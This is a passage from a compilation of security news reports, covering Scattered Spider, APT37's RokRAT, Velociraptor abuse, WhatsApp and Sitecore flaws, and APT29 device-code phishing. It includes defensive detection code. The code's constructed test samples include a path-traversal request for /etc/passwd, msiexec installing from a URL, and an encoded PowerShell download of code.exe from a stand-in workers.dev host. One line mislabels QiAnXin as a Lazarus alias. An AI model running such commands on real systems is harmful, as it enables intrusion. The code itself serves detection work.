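    if prefix is not None:
        args = params.get("arguments")
        path = args.get("path") if isinstance(args, dict) else None
        if not isinstance(path, str):
            return _decide(client_id, method, tool, False, "path argument required")
        # Normalise first so "../" segments cannot step outside the permitted directory.
        if not posixpath.normpath(path).startswith(prefix):
            return _decide(client_id, method, tool, False, "path outside allowed prefix")
    return _decide(client_id, method, tool, True, "allowed by policy")


def tool_call(name: str, arguments: dict) -> str:
    """Build a constructed tools/call request for trying the policy."""
    return json.dumps({"jsonrpc": "2.0", "id": 1, "method": "tools/call",
                       "params": {"name": name, "arguments": arguments}})


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    samples = [  # constructed requests
        ("tickets.search", {"q": "vpn outage"}),
        ("tickets.update", {"id": 7, "status": "closed"}),
        ("files.read", {"path": "/srv/docs/../../etc/passwd"}),
    ]
    for name, arguments in samples:
        print(name, evaluate("ide-assistant", tool_call(name, arguments)))
```

In a real deployment the client identity passed to `evaluate` would come from the authenticated connection (the OAuth token or mTLS certificate of step 5), never from the message body.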
AI + MCP is moving fast. The line between “helpful automation” and “security hole” is thin. By auditing, stress-testing, enforcing rules, and monitoring, you’re not just protecting against today’s risks—you’re preparing for tomorrow’s. Think of it like this: MCP gives your AI superpowers. Your job is to make sure those powers don’t get hijacked.
Conclusion
Quantum-safe encryption, AI-driven phishing, identity without passwords—these are not distant theories anymore. They are already shaping the security landscape quietly, underneath the day-to-day headlines. The closing lesson: the biggest shocks often arrive not as breaking news, but as trends that grow slowly until suddenly they cannot be ignored.
When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider
As enterprises continue to shift their operations to the browser, security teams face a growing set of cyber challenges. In fact, over 80% of security incidents now originate from web applications accessed via Chrome, Edge, Firefox, and other browsers. One particularly fast-evolving adversary, Scattered Spider, has made it their mission to wreak havoc on enterprises by specifically targeting sensitive data on these browsers. Scattered Spider, also referred to as UNC3944, Octo Tempest, or Muddled Libra, has matured over the past two years through precision targeting of human identity and browser environments.
This shift differentiates them from other notorious cybergangs like Lazarus Group, Fancy Bear, and REvil. If sensitive information such as your calendar, credentials, or security tokens is alive and well in browser tabs, Scattered Spider is able to acquire them. In this article, you’ll learn details about Scattered Spider’s attack methods and how you can stop them in their tracks. Overall, this is a wake-up call to CISOs everywhere to elevate the organization’s browser security from an ancillary control to a central pillar of their defense.
Scattered Spider’s Browser-Focused Attack Chain
Scattered Spider avoids high-volume phishing in favor of precision exploitation. This is done by leveraging users’ trust in their most used daily application, stealing saved credentials, and manipulating browser runtime.
- Browser Tricks - Techniques like Browser-in-the-Browser (BitB) overlays and auto-fill extraction are used to steal credentials while evading detection by traditional security tools like Endpoint Detection and Response (EDR).
- Session Token Theft - Scattered Spider and other attackers will bypass Multi-Factor Authentication (MFA) to capture tokens and personal cookies from the browser’s memory.
- Malicious Extensions & JavaScript Injection - Malicious payloads get delivered through fake extensions and execute in-browser via drive-by techniques and other advanced methods.
- Browser-Based Reconnaissance - Web APIs and the probing of installed extensions allow these attackers to map critical internal systems.
For a full technical breakdown of these tactics, see Scattered Spider Inside the Browser: Tracing Threads of Compromise.
Strategic Browser-Layer Security: A Blueprint for CISOs
To counteract Scattered Spider and other advanced browser threats, CISOs must utilize a multi-layered browser security strategy across the following domains.
1. Stop Credential Theft with Runtime Script Protection
Phishing attacks have been around for decades. Attackers like Scattered Spider, however, have advanced their techniques tenfold in recent years. These advanced phishing campaigns now rely on malicious JavaScript that executes directly inside the browser, bypassing security tools like EDR. This is done to steal user credentials and other sensitive data. In order to successfully block phishing overlays and intercept dangerous patterns that steal credentials, organizations must implement JavaScript runtime protection to analyze behavior. By applying such protection, security leaders can stop attackers from gaining access and stealing credentials before it’s too late.
2. Prevent Account Takeovers by Protecting Sessions
Once user credentials get into the wrong hands, attackers like Scattered Spider will move quickly to hijack previously authenticated sessions by stealing cookies and tokens. Securing the integrity of browser sessions can best be achieved by restricting unauthorized scripts from gaining access or exfiltrating these sensitive artifacts. Organizations must enforce contextual security policies based on components such as device posture, identity verification, and network trust. By linking session tokens to context, enterprises can prevent attacks like account takeovers, even after credentials have become compromised.
3. Enforce Extension Governance and Block Rogue Scripts
Browser extensions have become extremely popular in recent years, with Google Chrome featuring 130,000+ for download on the Chrome Web Store. While they can serve as productivity boosters, they have also become attack vectors. Malicious or poorly vetted extensions can request invasive permissions, inject malicious scripts into the browser, or act as the delivery system for attack payloads. Enterprises must enforce robust extension governance to allow pre-approved extensions with validated permissions. Equally important is the need to block untrusted scripts before they execute. This approach ensures that legitimate extensions remain available, so the user’s workflow is not disrupted.
4. Disrupt Reconnaissance Without Breaking Legitimate Workflows
Attackers like Scattered Spider will often begin attacks through in-browser reconnaissance. They do this by using APIs such as WebRTC, CORS, or fingerprinting to map the environment. This allows them to identify frequently used applications or track specific user behavior. To stop this reconnaissance, organizations must disable or replace sensitive APIs with decoys that deliver incorrect information to the attacking group. However, adaptive policies are needed to avoid the breaking of legitimate workflows, which are particularly important in BYOD and unmanaged devices.
5. Integrate Browser Telemetry into Actionable Security Intelligence
Although browser security is the last mile of defense for malware-less attacks, integrating it into an existing security stack will fortify the entire network. By implementing activity logs enriched with browser data into SIEM, SOAR, and ITDR platforms, CISOs can correlate browser events with endpoint activity for a much fuller picture. This will enable SOC teams to gain faster incident responses and better support threat hunting activities. Doing so can improve alert times on attacks and strengthen the overall security posture of an organization.
Browser Security Use Cases and Business Impacts
Deploying browser-native protection delivers measurable strategic benefits.
Use Case: Strategic Advantage
- Phishing & Attack Prevention: Stops in-browser credential theft before execution
- Web Extension Management: Control installs and permission requests from known and unknown web extensions
- Secure Enablement of GenAI: Implements adaptive, policy-based, and context-aware access to generative AI tools
- Data Loss Prevention: Ensures that no corporate data gets exposed or shared with unauthorized parties
- BYOD & Contractor Security: Secures unmanaged devices with per-session browser controls
- Zero Trust Reinforcement: Treats each browser session as an untrusted boundary, validating behavior contextually
- Application Connection: Ensures that a user is authenticated properly with the right levels of protection
- Secure Remote SaaS Access: Enables secure connection to internal SaaS apps without the need for additional agents or VPNs
Recommendations for Security Leadership
- Assess Your Risk Posture: Use tools like Browser Total™ to determine where browser vulnerabilities lie across your organization.
- Enable Browser Protection: Deploy a solution that’s capable of real-time JavaScript protection, token security, extension oversight, and telemetry across Chrome, Edge, Firefox, Safari, and all other browsers.
- Define Contextual Policies: Enforce rules on web APIs, the capturing of credentials, installing web extensions, and downloads.
- Integrate with Your Existing Stack: Feed browser-enabled threat telemetry into SIEM, SOAR, or EDR tools that you already use daily. This will enrich your detection and response capabilities.
- Educate Your Team: Cement browser security as a core principle of your Zero Trust architecture, SaaS protection, and BYOD access.
- Continuously Test and Validate: Simulate real browser-based attacks so you can validate your defenses and learn where your blind spots may be.
- Harden Identity Access Across Browsers: Put adaptive authentication in place that continuously validates identity within each session.
- Regularly Audit Browser Extensions: Develop review processes to keep track of all extensions in use.
- Apply Least-Privilege to Web APIs: Restrict sensitive browser APIs to only the business apps that require them.
- Automate Browser Threat Hunting: Leverage browser telemetry and integrate the data with your existing stack to hunt for suspicious patterns.
Final Thought: Browsers as the New Identity Perimeter
The Scattered Spider group personifies how attackers can evolve their tactics from targeting an endpoint to focusing on the enterprise’s most used application, the browser. They do so to steal identities, take over sessions, and remain inside a user’s environment without a trace.
CISOs must adapt and use browser-native security controls to stop these identity-based threats. Investing in a frictionless, runtime-aware security platform is the answer. Instead of being reactionary, security teams can stop attacks at the source. For all security leaders, enterprise browser protection doesn’t just work to mitigate attackers like Scattered Spider; it fortifies the window into your enterprise and upgrades the security posture for all SaaS applications, remote work, and beyond.
To learn more about Secure Enterprise Browsers and how they can benefit your organization, speak to a Seraphic expert. This article is a contributed piece from one of our valued partners.
ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics
Cybersecurity researchers have discovered a new phishing campaign undertaken by the North Korea-linked hacking group called ScarCruft (aka APT37) to deliver a malware known as RokRAT. The activity has been codenamed Operation HanKook Phantom by Seqrite Labs, stating the attacks appear to target individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. “The attackers likely aim to steal sensitive information, establish persistence, or conduct espionage,” security researcher Dixit Panchal said in a report published last week. The starting point of the attack chain is a spear-phishing email containing a lure for “National Intelligence Research Society Newsletter—Issue 52,” a periodic newsletter issued by a South Korean research group focused on national intelligence, labour relations, security, and energy issues.
The digital missive contains a ZIP archive attachment that contains a Windows shortcut (LNK) masquerading as a PDF document, which, when opened, launches the newsletter as a decoy while dropping RokRAT on the infected host. RokRAT is a known malware associated with APT37, with the tool capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. The gathered data is exfiltrated via Dropbox, Google Cloud, pCloud, and Yandex Cloud. Seqrite said it detected a second campaign in which the LNK file serves as a conduit for a PowerShell script that, besides dropping a decoy Microsoft Word document, runs an obfuscated Windows batch script that’s responsible for deploying a dropper.
The binary then runs a next-stage payload to steal sensitive data from the compromised host while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers’ Party of Korea, dated July 28, rejecting Seoul’s efforts at reconciliation. “The analysis of this campaign highlights how APT37 (ScarCruft/InkySquid) continues to employ highly tailored spear-phishing attacks, leveraging malicious LNK loaders, fileless PowerShell execution, and covert exfiltration mechanisms,” Panchal said. “The attackers specifically target South Korean government sectors, research institutions, and academics with the objective of intelligence gathering and long-term espionage.”
The development comes as cybersecurity company QiAnXin detailed attacks mounted by the infamous Lazarus Group (aka QiAnXin) using ClickFix-style tactics to trick job seekers into downloading a supposed NVIDIA-related update to address camera or microphone issues when providing a video assessment. Details of this activity were previously disclosed by Gen Digital in late July 2025. The ClickFix attack results in the execution of a Visual Basic Script that leads to the deployment of BeaverTail, a JavaScript stealer that can also deliver a Python-based backdoor dubbed InvisibleFerret. Furthermore, the attacks pave the way for a backdoor with command execution and file read/write capabilities.
The disclosure also follows new sanctions imposed by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs.
The Chollima Group, in a report released last week, detailed its investigation into an IT Worker cluster affiliated with Moonstone Sleet that it tracks as BABYLONGROUP in connection with a blockchain play-to-earn (P2E) game called DefiTankLand. It’s assessed that Logan King, the supposed CTO of DefiTankLand, is actually a North Korean IT Worker, a hypothesis bolstered by the fact that King’s GitHub account has been used as a reference by a Ukrainian freelancer and blockchain developer named “Ivan Kovch.”
“Many members had previously worked on a huge cryptocurrency project on behalf of a shady company called ICICB (who we believe to be a front), that one of the non-DPRK members of the cluster runs the Chinese cybercrime market FreeCity, and an interesting connection between DeTankZone and an older IT Worker who previously operated out of Tanzania,” the Chollima Group said. “While the DefiTankLand CEO Nabil Amrani has worked previously with Logan on other blockchain projects, we do not believe he is responsible for any of the development. This all means that the “legitimate” game behind Moonstone Sleet’s DeTankZone was in fact developed by DPRK IT Workers, only to be later picked up and used by a North Korean APT Group.”
Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling
Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor, illustrating ongoing abuse of legitimate software for malicious purposes. “In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server,” the Sophos Counter Threat Unit Research Team said in a report published this week. While threat actors are known to adopt living-off-the-land (LotL) techniques or take advantage of legitimate remote monitoring and management (RMM) tools in their attacks, the use of Velociraptor signals a tactical evolution, where incident response programs are being used to obtain a foothold and minimize the need for having to deploy their own malware.
Further analysis of the incident has revealed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which serves as a staging ground for other tools used by them, including a Cloudflare tunneling tool and a remote administration utility known as Radmin.
The MSI file is designed to install Velociraptor, which then establishes contact with another Cloudflare Workers domain. The access is then leveraged to download Visual Studio Code from the same staging server using an encoded PowerShell command and execute the source code editor with the tunnel option enabled in order to allow both remote access and remote code execution. The threat actors have also been observed utilizing the msiexec Windows utility again to download additional payloads from the workers[.]dev folder. “Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware,” Sophos said.
“Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat.” The disclosure comes as cybersecurity firms Hunters and Permiso detailed a malicious campaign that has leveraged Microsoft Teams for initial access, reflecting a growing pattern of threat actors weaponizing the platform’s trusted and deeply embedded role in enterprise-focused communications for malware deployment. These attacks begin with the threat actors using newly created or compromised tenants to send direct messages or initiate calls to targets, impersonating IT help desk teams or other trusted contacts to install remote access software like AnyDesk, DWAgent, or Quick Assist, and seize control of victim systems to deliver malware. While similar techniques involving remote access tools have been linked to ransomware groups like Black Basta since mid-2024, these newer campaigns forgo the preliminary email bombing step and ultimately make use of the remote access to deliver a PowerShell payload with capabilities commonly associated with credential theft, persistence, and remote code execution. “The lures used to initiate engagement are tailored to appear routine and unremarkable, typically framed as IT assistance related to Teams performance, system maintenance, or general technical support,” Permiso researcher Isuf Deliu said.
“These scenarios are designed to blend into the background of everyday corporate communication, making them less likely to trigger suspicion.” It’s worth noting that similar tactics have been employed to propagate malware families like DarkGate and Matanbuchus malware over the past year. The attacks also serve a Windows credential prompt to trick users into entering their passwords under the guise of a benign system configuration request, which are then harvested and saved to a text file on the system. “Microsoft Teams phishing isn’t a fringe technique anymore — it’s an active, evolving threat that bypasses traditional email defenses and exploits trust in collaboration tools,” security researchers Alon Klayman and Tomer Kachlon said. “By monitoring audit logs like ChatCreated and MessageSent, enriching signals with contextual data, and training users to spot IT/help desk impersonations, SOC teams can close this new gap before it’s exploited.”
The findings also follow the discovery of a novel malvertising campaign that combines legitimate office[.]com links with Active Directory Federation Services (ADFS) to redirect users to Microsoft 365 phishing pages that are capable of harvesting login information. The attack chain, in a nutshell, begins when a victim clicks on a rogue sponsored link on search engine results pages, triggering a redirect chain that ultimately leads them to a fake login page mimicking Microsoft. “It turns out the attacker had set up a custom Microsoft tenant with Active Directory Federation Services (ADFS) configured,” Push Security’s Luke Jennings said. “This means Microsoft will perform the redirect to the custom malicious domain.” “While this isn’t a vulnerability per se, the ability for attackers to add their own Microsoft ADFS server to host their phishing page and have Microsoft redirect to it is a concerning development that will make URL-based detections even more challenging than they already are.”
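Sophos's advice earlier in this article to monitor for unauthorized Velociraptor use and the surrounding tool chain (msiexec installing from a URL, an encoded PowerShell download, Visual Studio Code started with its tunnel option) can be turned into a per-host correlation over process-creation events. This is an added example, not code from Sophos or the original article. The event fields, host names, the approved-host inventory, and every sample command line (including the `constructed-sample.workers.dev` host) are constructed for illustration.

```python
"""Flag the tool chain described above in process-creation events (constructed data)."""
import base64
import binascii
import ntpath
import re
from collections import defaultdict

STAGING_SUFFIX = ".workers.dev"          # hosting suffix named in the article
APPROVED_VELOCIRAPTOR_HOSTS = {"IR-01"}  # assumption: where responders run the tool

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
# Common spellings of PowerShell's encoded-command switch: -e, -ec, -enc, -EncodedCommand
ENC_RE = re.compile(r"\s[-/]e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
TUNNEL_RE = re.compile(r"\stunnel(?:\s|$)", re.I)


def ps_encode(script):
    """Build a constructed encoded-command value: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the decoded PowerShell script, or None when there is none."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def check_event(event):
    """Return (rule names, staging hosts seen) for one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"]
    script = decode_encoded_command(cmd) if image in {"powershell.exe", "pwsh.exe"} else None
    rules = []
    if image == "msiexec.exe" and URL_RE.search(cmd):
        rules.append("msiexec_remote_install")
    if script and URL_RE.search(script):
        rules.append("encoded_powershell_download")
    if image == "code.exe" and TUNNEL_RE.search(cmd):  # misses a renamed binary
        rules.append("vscode_tunnel")
    if image.startswith("velociraptor") and event["host"] not in APPROVED_VELOCIRAPTOR_HOSTS:
        rules.append("unapproved_velociraptor")
    urls = URL_RE.findall(cmd + " " + (script or ""))
    staging = {h.lower() for h in urls if h.lower().endswith(STAGING_SUFFIX)}
    return rules, staging


def triage(events):
    """Group hits per host; two or more distinct stages on one host is high severity."""
    per_host = defaultdict(lambda: {"rules": set(), "staging": set()})
    for event in events:
        rules, staging = check_event(event)
        if rules:
            per_host[event["host"]]["rules"].update(rules)
            per_host[event["host"]]["staging"].update(staging)
    return {
        host: {"rules": sorted(hit["rules"]),
               "staging_hosts": sorted(hit["staging"]),
               "severity": "high" if len(hit["rules"]) >= 2 else "medium"}
        for host, hit in per_host.items()
    }


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events, not taken from the incident
    {"host": "WS-042", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i https://constructed-sample.workers.dev/v2.msi"},
    {"host": "WS-042", "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "command_line": "Velociraptor.exe service run"},
    {"host": "WS-042", "image": PS,
     "command_line": "powershell.exe -nop -enc " + ps_encode(
         "Invoke-WebRequest https://constructed-sample.workers.dev/code.exe -OutFile code.exe")},
    {"host": "WS-042", "image": r"C:\ProgramData\code.exe",
     "command_line": r"C:\ProgramData\code.exe tunnel"},
    {"host": "IR-01", "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "command_line": "Velociraptor.exe service run"},
    {"host": "DEV-07", "image": r"C:\Apps\VS Code\Code.exe",
     "command_line": r'"C:\Apps\VS Code\Code.exe" C:\src\tunnel-docs'},
    {"host": "DEV-07", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /i C:\Temp\printer-driver.msi /qn"},
]

if __name__ == "__main__":
    for host, summary in triage(SAMPLE_EVENTS).items():
        print(host, summary)
```

The approved-host set is the part that needs local data: without an inventory of where responders legitimately run Velociraptor, the last rule fires on every deployment.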
WhatsApp Patches Zero-Click Exploit Targeting iOS and macOS Devices
WhatsApp has addressed a security vulnerability in its messaging apps for Apple iOS and macOS that it said may have been exploited in the wild in conjunction with a recently disclosed Apple flaw in targeted zero-day attacks. The vulnerability, CVE-2025-55177 (CVSS score: 8.0 [CISA-ADP]/5.4 [Facebook]), relates to a case of insufficient authorization of linked device synchronization messages. Internal researchers on the WhatsApp Security Team have been credited with discovering and rerating the bug. The Meta-owned company said the issue “could have allowed an unrelated user to trigger processing of content from an arbitrary URL on a target’s device.” The flaw affects the following versions -
- WhatsApp for iOS prior to version 2.25.21.73 (Patched on July 28, 2025)
- WhatsApp Business for iOS version 2.25.21.78 (Patched on August 4, 2025), and
- WhatsApp for Mac version 2.25.21.78 (Patched on August 4, 2025)
It also assessed that the shortcoming may have been chained with CVE-2025-43300, a vulnerability affecting iOS, iPadOS, and macOS, as part of a sophisticated attack against specific targeted users.
CVE-2025-43300 was disclosed by Apple last week as having been weaponized in an “extremely sophisticated attack against specific targeted individuals.” The vulnerability in question is an out-of-bounds write vulnerability in the ImageIO framework that could result in memory corruption when processing a malicious image. Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International, said WhatsApp has notified an unspecified number of individuals that they believe were targeted by an advanced spyware campaign in the past 90 days using CVE-2025-55177. In the alert sent to the targeted individuals, WhatsApp has also recommended performing a full device factory reset and keeping their operating system and the WhatsApp app up-to-date for optimal protection. It’s currently not known who, or which spyware vendor, is behind the attacks.
Ó Cearbhaill described the pair of vulnerabilities as a “zero-click” attack, meaning it does not require any user interaction, such as clicking a link, to compromise their device. “Early indications are that the WhatsApp attack is impacting both iPhone and Android users, civil society individuals among them,” Ó Cearbhaill said. “Government spyware continues to pose a threat to journalists and human rights defenders.”
Update
In a statement shared with The Hacker News, WhatsApp said it sent in-app threat notifications to less than 200 users who may have been targeted as part of the campaign. (The story was updated after publication to clarify that patches were released for the flaw in late July/August 2025.)
Researchers Warn of Sitecore Exploit Chain Linking Cache Poisoning and Remote Code Execution
Three new security vulnerabilities have been disclosed in the Sitecore Experience Platform that could be exploited to achieve information disclosure and remote code execution. The flaws, per watchTowr Labs, are listed below -
- CVE-2025-53693 - HTML cache poisoning through unsafe reflections
- CVE-2025-53691 - Remote code execution (RCE) through insecure deserialization
- CVE-2025-53694 - Information Disclosure in ItemService API with a restricted anonymous user, leading to exposure of cache keys using a brute-force approach
Patches for the first two shortcomings were released by Sitecore in June and for the third in July 2025, with the company stating that “successful exploitation of the related vulnerabilities might lead to remote code execution and non-authorized access to information.” The findings build on three more flaws in the same product that were detailed by watchTowr back in June -
- CVE-2025-34509 (CVSS score: 8.2) - Use of hard-coded credentials
- CVE-2025-34510 (CVSS score: 8.8) - Post-authenticated remote code execution via path traversal
- CVE-2025-34511 (CVSS score: 8.8) - Post-authenticated remote code execution via Sitecore PowerShell Extension
watchTowr Labs researcher Piotr Bazydlo said the newly uncovered bugs could be fashioned into an exploit chain by bringing together the pre-auth HTML cache poisoning vulnerability with a post-authenticated remote code execution issue to compromise a fully-patched Sitecore Experience Platform instance.
The entire sequence of events leading up to code execution is as follows: A threat actor could leverage the ItemService API, if exposed, to trivially enumerate HTML cache keys stored in the Sitecore cache and send HTTP cache poisoning requests to those keys. This could then be chained with CVE-2025-53691 to supply malicious HTML code that ultimately results in code execution by means of an unrestricted BinaryFormatter call.
“We managed to abuse a very restricted reflection path to call a method that lets us poison any HTML cache key,” Bazydlo said. “That single primitive opened the door to hijacking Sitecore Experience Platform pages - and from there, dropping arbitrary JavaScript to trigger a Post-Auth RCE vulnerability.”
Webinar: Learn How to Unite Dev, Sec, and Ops Teams With One Shared Playbook
Picture this: Your team rolls out some new code, thinking everything’s fine. But hidden in there is a tiny flaw that explodes into a huge problem once it hits the cloud. Next thing you know, hackers are in, and your company is dealing with a mess that costs millions. Scary, right?
In 2025, the average data breach hits businesses with a whopping $4.44 million bill globally. And guess what? A big chunk of these headaches comes from app security slip-ups, like web attacks that snag credentials and wreak havoc. If you’re in dev, ops, or security, you’ve probably felt that stress—endless alerts, teams arguing over who’s to blame, and fixes that take forever.
But hey, it doesn’t have to be this way. What if you could spot those risks early, from the moment code is written all the way to when it’s running in the cloud? That’s the magic of code-to-cloud visibility, and it’s changing how smart teams handle app security. Our upcoming webinar, “Code-to-Cloud Visibility: The New Foundation for Modern AppSec,” is your chance to learn how.
It’s happening on September 8, 2025—just a few weeks away. This isn’t some boring lecture; it’s real talk from experts who’ve been there, packed with tips you can use right away. Sign up for the Webinar Now and grab your spot before it’s gone!
The Real Headache Hiding in Your Apps
Let’s be honest: As companies grow and push more work onto dev teams, things get messy.
Risks pop up in code but only show up later in the cloud, leading to confusion, slow fixes, and attackers getting the jump on you. Recent reports show that inefficient vulnerability handling is a top pain for 32% of organizations, and securing AI tools like GenAI is right behind at 30%. Even worse, 97% of companies are dealing with GenAI-related security issues. Without a clear view from code to cloud, you’re basically guessing—and that leaves doors open for bad guys.
I’ve chatted with folks in the trenches who share war stories: Late nights scrambling to patch holes that could’ve been fixed days earlier. It’s draining, and with breaches costing more than ever, it’s hitting the bottom line hard. The good news? Code-to-cloud visibility connects the dots, giving you full sight into vulnerabilities, secrets, and setup mistakes.
It helps teams catch issues early, fix them fast, and work together better—no more finger-pointing. What You’ll Walk Away With: Simple Steps to Level Up Your Security In this quick 60-minute chat, our pros will break down why this approach is becoming a must-have for app security programs. Gartner says by 2026, 40% of companies will jump on board with tools like ASPM to handle risks smarter. We’ll keep it straightforward, no tech overload—just practical stuff.
Here’s what you’ll get:
- Get Everyone on the Same Page: See how linking code risks to cloud behavior creates a simple shared plan. Dev, ops, and security teams can finally team up, cut the noise, and speed up feedback.
- Focus on What Really Matters: Learn easy ways to map out risks and zero in on your key apps. We’ll share real examples, like tracing a code glitch to its cloud weak spot, so you can plug holes before hackers notice.
- Fix Things Quicker: Grab step-by-step ideas to automate fixes and slash remediation time—some teams see drops of 30% or more in vulnerabilities and days shaved off fixes. Imagine adding this to your workflow without slowing down your work.
- Stay Ahead of New Threats: We’ll cover hot topics like safe AI use and rules pushing for better security. Plus, a handy checklist to check your setup and quick wins to try tomorrow.
People who’ve joined similar sessions say it changed how they work: “It connected the dots and stopped us from chasing shadows,” one ops guy told me. Ready to make that change for your team? Sign up for the Webinar Now and start turning those insights into action.
Why Jump In Now? Threats Aren’t Waiting
With big attacks making headlines—like the PowerSchool breach hitting millions or ransomware messing with supply chains in 2025—delaying isn’t smart. Code-to-cloud visibility isn’t fancy tech; it’s your shield to bake security in from start to finish. Don’t wait for a crisis—get ahead and make your apps tougher. Seats are going quickly, so sign up today. You’ll also snag a free ASPM checklist and the recording to watch later. It’s a small time investment for big peace of mind. Sign Up for the Webinar Now – Can’t wait to see you there!
This article is a contributed piece from one of our valued partners.
Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication
Amazon on Friday said it flagged and disrupted what it described as an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors as part of their intelligence gathering efforts. The campaign used “compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code authentication flow,” Amazon’s Chief Information Security Officer CJ Moses said. APT29, also tracked as BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, Earth Koshchei, ICECAP, Midnight Blizzard, and The Dukes, is the name assigned to a state-sponsored hacking group with ties to Russia’s Foreign Intelligence Service (SVR). In recent months, the prolific threat actor has been linked to attacks leveraging malicious Remote Desktop Protocol (RDP) configuration files to target Ukrainian entities and exfiltrate sensitive data.
Since the start of the year, the adversarial collective has been observed adopting various phishing methods, including device code phishing and device join phishing, to obtain unauthorized access to Microsoft 365 accounts. As recently as June 2025, Google said it observed a threat cluster with affiliations to APT29 weaponizing a Google account feature called application-specific passwords to gain access to victims’ emails. The highly targeted campaign was attributed to UNC6293. The latest activity identified by Amazon’s threat intelligence team underscores the threat actor’s continued efforts to harvest credentials and gather intelligence of interest, while simultaneously sharpening their tradecraft.
“This opportunistic approach illustrates APT29’s continued evolution in scaling their operations to cast a wider net in their intelligence collection efforts,” Moses said. The attacks involved APT29 compromising various legitimate websites and injecting JavaScript that redirected approximately 10% of visitors to actor-controlled domains, such as findcloudflare[.]com, that mimicked Cloudflare verification pages to give an illusion of legitimacy. In reality, the end goal of the campaign was to entice victims into entering a legitimate device code generated by the threat actor into a sign-in page, effectively granting them access to their Microsoft accounts and data. This technique was detailed by both Microsoft and Volexity back in February 2025.
The activity is also noteworthy for incorporating various evasion techniques, such as Base64 encoding to conceal malicious code, setting cookies to prevent repeated redirects of the same visitor, and shifting to new infrastructure when blocked. Amazon told The Hacker News that it doesn’t have additional information on how many websites were compromised as part of this effort, and how these sites were hacked in the first place. The tech giant also noted that it was able to link the domains used in this campaign with infrastructure previously attributed to APT29. “Despite the actor’s attempts to migrate to new infrastructure, including a move off AWS to another cloud provider, our team continued tracking and disrupting their operations,” Moses said.
“After our intervention, we observed the actor register additional domains such as cloudflare.redirectpartners[.]com, which again attempted to lure victims into Microsoft device code authentication workflows.”
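A defender-side check for the device code abuse described above, as an added example that is not part of the original article or of Amazon's tooling. It flags device code sign-ins by users who have never used that flow, and activity from a previously unseen IP shortly after the grant; the record format, field names, and sample data are assumptions constructed for illustration.

```python
import json
from datetime import datetime, timedelta

# Constructed sample sign-in records, one JSON object per line (not real data).
# Field names (time, user, protocol, ip) are assumptions for this example;
# map them to whatever your identity provider's sign-in log export uses.
SAMPLE_LOG = """\
{"time": "2025-08-20T08:01:00", "user": "alice@example.com", "protocol": "oauth2", "ip": "198.51.100.10"}
{"time": "2025-08-21T08:03:00", "user": "alice@example.com", "protocol": "oauth2", "ip": "198.51.100.10"}
{"time": "2025-08-22T10:15:00", "user": "alice@example.com", "protocol": "deviceCode", "ip": "198.51.100.10"}
{"time": "2025-08-22T10:17:00", "user": "alice@example.com", "protocol": "oauth2", "ip": "203.0.113.77"}
{"time": "2025-08-20T09:00:00", "user": "kiosk@example.com", "protocol": "deviceCode", "ip": "192.0.2.5"}
{"time": "2025-08-22T09:00:00", "user": "kiosk@example.com", "protocol": "deviceCode", "ip": "192.0.2.5"}
{"time": "2025-08-22T09:05:00", "user": "kiosk@example.com", "protocol": "oauth2", "ip": "192.0.2.5"}
"""


def parse_records(text):
    """Parse JSON-lines text into records sorted by timestamp."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["time"] = datetime.fromisoformat(rec["time"])
        records.append(rec)
    return sorted(records, key=lambda r: r["time"])


def flag_device_code_signins(records, report_from, follow_window=timedelta(minutes=30)):
    """Return device code sign-ins at or after report_from that look unusual.

    Records before report_from only build the per-user baseline.
    """
    cutoff = datetime.fromisoformat(report_from)
    seen_ips = {}              # user -> IPs observed so far
    device_code_users = set()  # users who have used the flow before
    open_grants = {}           # user -> most recent reported device code finding
    findings = []
    for rec in records:
        user, ip = rec["user"], rec["ip"]
        known = seen_ips.setdefault(user, set())
        if rec["time"] >= cutoff:
            if rec["protocol"] == "deviceCode":
                finding = {"user": user, "time": rec["time"], "reasons": []}
                if user not in device_code_users:
                    finding["reasons"].append("first device code sign-in for this user")
                open_grants[user] = finding
                findings.append(finding)
            elif user in open_grants:
                grant = open_grants[user]
                recent = rec["time"] - grant["time"] <= follow_window
                if recent and ip not in known:
                    grant["reasons"].append(f"activity from new IP {ip} after grant")
        # Update the baseline only after the record has been evaluated.
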